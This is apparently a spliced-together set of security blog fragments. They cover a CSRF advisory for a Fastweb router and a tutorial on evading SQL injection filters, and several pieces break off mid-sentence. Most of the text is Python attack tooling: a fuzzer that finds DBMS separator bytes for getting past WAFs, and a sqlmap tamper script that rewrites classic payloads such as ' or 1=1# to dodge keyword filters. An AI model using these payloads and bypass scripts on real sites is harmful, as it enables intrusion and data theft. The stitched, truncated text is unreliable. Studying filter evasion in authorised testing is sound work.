In May 2020, I discovered a CSRF vulnerability affecting the web administration panel of my home router. The router was provided to me by Fastweb, an Italian ISP with which I have an active Internet subscription. The vulnerable router model is listed below, in the “System Affected” section.
The router’s web administration panel is vulnerable to Cross-Site Request Forgery (CVE-2020-13620).
As OWASP states:
“Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. With a little help of…
In this article I will show you a simple technique I learned from this talk on SQL injection obfuscation and optimization: https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf
The talk is very interesting and I suggest you take a look at the slides linked above.
Among other things, the talk explains how, in some situations, it can be very useful to write a small fuzzer for a DBMS (I will use MySQL in this exercise) in order to find unusual characters that may help you bypass weak security filters or WAFs during a web security assessment.
Let’s simulate a situation where…
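A minimal version of such a fuzzer, added here as an illustration and not code from the talk or from this post. It runs against SQLite through Python's standard sqlite3 module so that it works offline, whereas the post targets MySQL; the probe templates, the candidate list and the function names are my own assumptions. The method is the same for any DBMS: insert every candidate byte (and a few multi-byte sequences) at the marked positions of a known-good statement and keep only the candidates for which the statement still executes and returns the expected row.

```python
import sqlite3

# Candidates: every single byte except NUL (Python's sqlite3 module rejects a
# NUL inside the statement text before SQLite's parser ever sees it), plus a
# few multi-byte sequences that act as whitespace in most SQL dialects.
SINGLE_BYTES = [chr(b) for b in range(1, 256)]
MULTI_BYTE = ["/**/", "/*x*/", "--\n", "\r\n"]

# Assumed probe templates: "{c}" marks where a candidate is inserted. The
# literals are chosen so that a candidate which silently truncates the
# statement (e.g. by opening a comment) changes the result and is rejected.
PROBES = {
    "between keywords": ("SELECT 0{c}OR{c}1", (1,)),
    "around an operator": ("SELECT 2{c}={c}2", (1,)),
}


def fuzz_separators(template, expected, conn=None, candidates=None):
    """Return the candidates that, inserted at every "{c}" in `template`,
    leave a statement that still executes AND returns exactly `expected`."""
    if conn is None:
        conn = sqlite3.connect(":memory:")  # stand-in for the target DBMS
    if candidates is None:
        candidates = SINGLE_BYTES + MULTI_BYTE
    accepted = []
    for c in candidates:
        sql = template.replace("{c}", c)
        try:
            row = conn.execute(sql).fetchone()
        except (sqlite3.Error, sqlite3.Warning, ValueError):
            continue  # the parser (or the driver) rejected this candidate
        if row == expected:
            accepted.append(c)
    return accepted


def run_probes(conn=None):
    """Run every probe template and map its name to the accepted candidates."""
    return {name: fuzz_separators(tpl, exp, conn)
            for name, (tpl, exp) in PROBES.items()}


def as_hex(seq):
    """Show a candidate as hex bytes so non-printing characters are visible."""
    return " ".join(f"{b:02x}" for b in seq.encode("utf-8"))


def rewrite_payload(payload, separator):
    """Swap the spaces of a classic payload for one of the accepted separators."""
    return payload.replace(" ", separator)


if __name__ == "__main__":
    for name, found in run_probes().items():
        print(f"{name}: {len(found)} candidate(s) accepted")
        for c in found:
            print(f"  {as_hex(c):<12} {c!r}")
    # A classic payload with every space replaced by a form feed (0x0c)
    print(repr(rewrite_payload("' or 1=1 --", "\x0c")))
```

Pointing the same loop at MySQL only requires swapping in a MySQL connection and its driver's exception types. The acceptance criterion is "returns the expected row", not merely "no error": with a template such as `SELECT 1{c}OR{c}0`, a byte that starts a comment (`#` in MySQL) would swallow the rest of the statement and still return 1, and the fuzzer would wrongly report it as a usable separator. MySQL is known to accept bytes such as 0x0B and 0xA0 as whitespace that SQLite rejects, which is exactly the kind of DBMS-specific difference this loop is meant to surface.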
sqlmap is a very useful tool when you want to automate the exploitation of a SQL injection vulnerability and extract protected data from a website. To defend against this type of attack, developers often introduce keyword filters and/or use a WAF (Web Application Firewall) that blocks common SQL injection payloads.
Most of the time, these filters are regex-based. Let’s see an example:
This simple filter blocks the keywords OR and AND and is case-insensitive (note the i at the end of the regex). So, classic payloads like:
' or 1=1#
' and 1=2#
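To make the filter concrete (the post's own regex is not reproduced above, so the one below is an assumed stand-in that blocks the keywords OR and AND case-insensitively) and to show how sqlmap is steered around it, here is a small tamper script in the shape sqlmap expects, swapping the keywords for MySQL's symbolic operators. This is added example code, not from the post and not sqlmap's own; the filter regex, the `is_blocked` and `bypasses_filter` helpers and the script name are my assumptions.

```python
import re

try:
    # Inside sqlmap's tamper/ directory the real enum is importable.
    from lib.core.enums import PRIORITY
    __priority__ = PRIORITY.NORMAL
except ImportError:
    # Stand-alone (sqlmap not on sys.path): any value works for testing.
    __priority__ = 0

# Assumed stand-in for the post's filter: block the keywords OR and AND,
# case-insensitively (Python's re.I is the /.../i flag of a JS-style regex).
FILTER = re.compile(r"\b(or|and)\b", re.I)


def is_blocked(payload):
    """True if the (assumed) keyword filter would reject this payload."""
    return FILTER.search(payload) is not None


def dependencies():
    """sqlmap hook: nothing extra is required by this script."""
    pass


def tamper(payload, **kwargs):
    """sqlmap hook: rewrite AND/OR to MySQL's symbolic forms.

    "' and 1=2#"  ->  "' && 1=2#"
    "' or 1=1#"   ->  "' || 1=1#"
    Word boundaries keep ORDER, ORACLE, ANDROID etc. untouched.
    """
    if not payload:
        return payload
    payload = re.sub(r"(?i)\bAND\b", "&&", payload)
    payload = re.sub(r"(?i)\bOR\b", "||", payload)
    return payload


def bypasses_filter(payload):
    """Was the original blocked, and does the tampered version get through?"""
    return is_blocked(payload) and not is_blocked(tamper(payload))
```

Dropped into sqlmap's tamper/ directory as, say, symbolic_or_and.py (a hypothetical name), it is enabled with --tamper=symbolic_or_and; sqlmap already ships a similar script under the name symboliclogical. Two caveats before relying on it: `||` is logical OR in MySQL's default SQL mode, but it is string concatenation in PostgreSQL, Oracle and SQLite (and in MySQL with PIPES_AS_CONCAT set), so confirm the backend first; and the rewrite only defeats a plain keyword match, so a filter that also blocks `&&` and `||` needs a different tamper.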